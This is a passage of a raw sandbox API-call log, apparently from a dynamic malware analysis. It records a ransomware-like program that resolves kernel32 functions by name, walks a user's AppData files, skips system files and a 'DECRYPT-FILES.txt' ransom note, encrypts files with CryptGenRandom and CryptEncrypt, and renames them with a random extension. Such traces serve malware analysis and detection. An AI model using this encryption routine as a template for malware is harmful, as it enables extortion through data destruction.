lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0077.201] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0077.201] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0077.201] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0077.201] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0077.201] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0077.201] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0077.201] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0077.201] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0077.201] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0077.201] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0077.201] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0077.202] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0077.202] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0077.202] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0077.202] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0077.202] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0077.202] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0077.202] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0077.202] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0077.202] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0077.202] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0077.202] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0077.202] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0077.202] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0077.202] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0077.202] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0077.202] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0077.202] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0077.202] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0077.202] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0077.202] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0077.202] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0077.202] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ISyuUqVLVoKe2TYf1F.mkv") returned 68 [0077.202] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ISyuUqVLVoKe2TYf1F.mkv.IOj6") returned 73 [0077.202] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ISyuUqVLVoKe2TYf1F.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\isyuuqvlvoke2tyf1f.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ISyuUqVLVoKe2TYf1F.mkv.IOj6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\isyuuqvlvoke2tyf1f.mkv.ioj6"), dwFlags=0x0) returned 1 [0077.203] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.203] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.204] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.204] FindNextFileW (in: hFindFile=0x5f8c58, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa9d5a6e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa9d5a6e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa9d5a6e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0077.204] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0077.204] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0077.204] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0077.204] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0077.204] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0077.204] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0077.204] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0077.204] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0077.204] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0077.204] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0077.204] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.204] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0077.204] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0077.204] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0077.204] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0077.204] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0077.204] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.204] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0077.204] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\jkbimi8.tmp" [0077.204] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0077.205] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0077.205] CloseHandle (hObject=0x0) returned 0 [0077.205] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.205] FindNextFileW (in: hFindFile=0x5f8c58, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xab5a2530, ftCreationTime.dwHighDateTime=0x1d4ce0f, ftLastAccessTime.dwLowDateTime=0x71cf0d40, ftLastAccessTime.dwHighDateTime=0x1d4ce4f, ftLastWriteTime.dwLowDateTime=0x71cf0d40, ftLastWriteTime.dwHighDateTime=0x1d4ce4f, nFileSizeHigh=0x0, nFileSizeLow=0x10a09, dwReserved0=0x0, dwReserved1=0x0, cFileName="jO2V.bmp", cAlternateFileName="")) returned 1 [0077.205] lstrcmpiW (lpString1="jO2V.bmp", lpString2="DECRYPT-FILES.txt") returned 1 [0077.205] lstrcmpiW (lpString1="jO2V.bmp", lpString2="autorun.inf") returned 1 [0077.205] lstrcmpiW (lpString1="jO2V.bmp", lpString2="boot.ini") returned 1 [0077.205] lstrcmpiW (lpString1="jO2V.bmp", lpString2="desktop.ini") returned 1 [0077.205] lstrcmpiW (lpString1="jO2V.bmp", lpString2="ntuser.dat") returned -1 [0077.205] lstrcmpiW (lpString1="jO2V.bmp", lpString2="iconcache.db") returned 1 [0077.205] lstrcmpiW (lpString1="jO2V.bmp", lpString2="bootsect.bak") returned 1 [0077.205] lstrcmpiW (lpString1="jO2V.bmp", lpString2="ntuser.dat.log") returned -1 [0077.205] lstrcmpiW (lpString1="jO2V.bmp", lpString2="thumbs.db") returned -1 [0077.205] lstrcmpiW (lpString1="jO2V.bmp", lpString2="Bootfont.bin") returned 1 [0077.205] lstrlenW (lpString="jO2V.bmp") returned 8 [0077.205] lstrcmpiW (lpString1="bmp", lpString2="lnk") returned -1 [0077.205] lstrcmpiW (lpString1="bmp", lpString2="exe") returned -1 [0077.205] lstrcmpiW (lpString1="bmp", lpString2="sys") returned -1 [0077.205] lstrcmpiW (lpString1="bmp", lpString2="dll") returned -1 [0077.205] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0077.205] lstrlenW (lpString="jO2V.bmp") returned 8 [0077.205] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0077.205] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="jO2V.bmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\jO2V.bmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\jO2V.bmp" [0077.206] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0077.206] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\jO2V.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\jo2v.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0077.206] GetFileSizeEx (in: hFile=0x440, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=68105) returned 1 [0077.206] CreateFileMappingW (hFile=0x440, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x444 [0077.206] MapViewOfFile (hFileMappingObject=0x444, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x10d0000 [0077.206] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0077.206] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0077.206] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0077.206] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfc0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfc0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0077.207] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10f0000 [0077.208] VirtualFree (lpAddress=0x10f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.208] UnmapViewOfFile (lpBaseAddress=0x10d0000) returned 1 [0077.209] CloseHandle (hObject=0x444) returned 1 [0077.209] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.209] WriteFile (in: hFile=0x440, lpBuffer=0xfc0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfc0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0077.210] CloseHandle (hObject=0x0) returned 0 [0077.210] CloseHandle (hObject=0x440) returned 1 [0077.211] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.211] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.211] GetTickCount () returned 0x114bcf9 [0077.211] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0077.212] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0077.212] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0077.212] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0077.212] lstrlenA (lpString="kernel32.dll") returned 12 [0077.212] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0077.212] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0077.212] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0077.212] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0077.212] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0077.212] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0077.212] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0077.212] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0077.212] lstrlenA (lpString="ADDATOMA") returned 8 [0077.212] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0077.213] lstrlenA (lpString="ADDATOMW") returned 8 [0077.213] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0077.213] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0077.213] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0077.213] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0077.213] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0077.213] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0077.213] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0077.213] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0077.213] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0077.213] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0077.213] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0077.213] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0077.213] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0077.213] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0077.213] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0077.213] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0077.213] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0077.213] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0077.213] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0077.213] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0077.213] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0077.213] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0077.213] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0077.213] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0077.213] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0077.213] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0077.213] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0077.213] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0077.213] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0077.213] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0077.213] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0077.213] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0077.213] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0077.213] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0077.213] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0077.213] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0077.214] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0077.214] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0077.214] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0077.214] lstrlenA (lpString="BACKUPREAD") returned 10 [0077.214] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0077.214] lstrlenA (lpString="BACKUPSEEK") returned 10 [0077.214] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0077.214] lstrlenA (lpString="BACKUPWRITE") returned 11 [0077.214] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0077.214] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0077.214] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0077.214] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0077.214] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0077.214] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0077.214] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0077.214] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0077.214] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0077.214] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0077.214] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0077.214] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0077.214] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0077.214] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0077.214] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0077.214] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0077.214] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0077.214] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0077.214] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0077.214] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0077.214] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0077.214] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0077.214] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0077.214] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0077.214] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0077.214] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0077.214] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0077.214] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0077.214] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0077.215] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0077.215] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0077.215] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0077.215] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0077.215] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0077.215] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0077.215] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0077.215] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0077.215] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0077.215] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0077.215] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0077.215] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0077.215] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0077.215] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0077.215] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0077.215] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0077.215] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0077.215] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0077.215] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0077.215] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0077.215] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0077.215] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0077.215] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0077.215] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0077.215] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0077.215] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0077.215] lstrlenA (lpString="BEEP") returned 4 [0077.215] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0077.215] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0077.215] lstrcpyA (in: lpString1=0x3f2d1ec, 